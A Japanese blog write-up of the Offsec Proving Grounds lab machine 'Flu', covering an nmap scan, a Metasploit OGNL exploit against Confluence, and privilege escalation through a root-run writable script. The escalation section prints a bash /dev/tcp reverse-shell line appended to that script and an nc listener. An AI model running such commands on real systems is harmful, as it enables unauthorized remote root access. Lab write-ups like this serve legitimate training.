はじめに
本記事は学習目的として作成されています。
書かれている全ての攻撃は認められた環境で行っており
外部に向けた許可を得ない攻撃は法律により罰せられます。
この記事の方法を外部に対して行ったことによる結果について当方は如何なる責任も負いません。
こんにちは
今回はOffsec社のProving Groundsにて公開されているマシン
Fluを攻略していきます.
OGNLインジェクションに対して脆弱なマシンです
環境は以下
AttackerIP=192.168.45.231
TargetIP=192.168.136.41
偵察
─$ nmap -sV -sC -O -T4 -n -Pn 192.168.136.41
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0)
8090/tcp open http Apache Tomcat (language: en)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Log In - Confluence
|_Requested resource was /login.action?os_destination=%2Findex.action&permissionViolation=true
OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.47 seconds
Nmap の結果、 ポート 8090で Atlassian Confluence が動作していることが判明しました。
OGNLインジェクションに対して脆弱との事前情報があるので
MSFで調べてみます

エクスプロイトがみつかったので今回はこれを使っていきます。
初期アクセス
エクスプロイトを行った結果初期シェルが獲得できました。
whoami
と
Pwd
で現在地を把握します
その時にlog-Backup.shという自身の権限で書き込みが可能かつ他者も実行可能な興味深いファイルが見つかりました
もしRootによって自動的に実行されていれば一気に権限昇格ができます。
(実行したときは一般的に実行者の権限となるため)
権限昇格
仮説が本当に正しいか証明するためにCrontabを確認しましたが目当てのタスクは見つかりませんでした。
正直、お手上げです。
と、その時天の声が聞こえました
『汝、pspyを使いなさい』と
我、天啓を得たり!
てことで早速インストールしました

ビンゴ!!!ということはさっきのlog-Backup.shの内容を変えることで
Root権限で実行されて権限昇格ができるはずです
echo "bash -i >& /dev/tcp/192.168.45.231/4444 0>&1" >> /opt/log-backup.sh
これでシェルを追加するように追記して
nc -lvnp 4444
あとは待機するだけなので飲み物でも飲んでおきます。
Root権限が取得できました
まとめ
今回のものは定期実行されるタスクがおそらく/rootの個人ディレクトリ等にあったため、表示がされなかったものだと思います。
それでも、プロセス監視ツールでモニタリングすればわかってしまうので、使われるファイルの権限管理だったり
そもそも初期侵入されないためにアップデートをしっかりしておくなど基本的な対策がとても大事だなと思いました。
侵入までは5分だったけど

50分かかってしまい1時間でした。
もっと柔軟な発想力を身に着けたいですね
さて!!エンジニア積極採用中のGiGOOOのHPは
こちら![]()



